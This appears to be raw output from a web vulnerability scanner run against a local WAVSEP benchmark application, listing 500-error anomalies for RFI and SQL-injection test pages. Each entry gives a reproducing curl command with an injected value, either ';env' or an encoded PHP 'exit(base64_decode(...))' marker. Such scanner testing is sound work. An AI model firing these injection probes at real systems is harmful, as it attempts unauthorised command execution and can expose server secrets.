curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

orderby=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case11-InjectionInView-Date-PermissionBypass-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case12-InjectionInSearch-Date-UnionExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case13-InjectionInCalc-Date-BooleanExploit-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case14-InjectionInUpdate-Date-CommandInjection-WithErrors.jsp" -d "transactionDate=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionDate=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

transactionId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgId=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

minBalanace=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msgid=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=letmein"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case03-InjectionInCalc-String-BooleanExploit-WithErrors.jsp" -d "username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp
Content-Type: application/x-www-form-urlencoded

msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp" -d "msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1
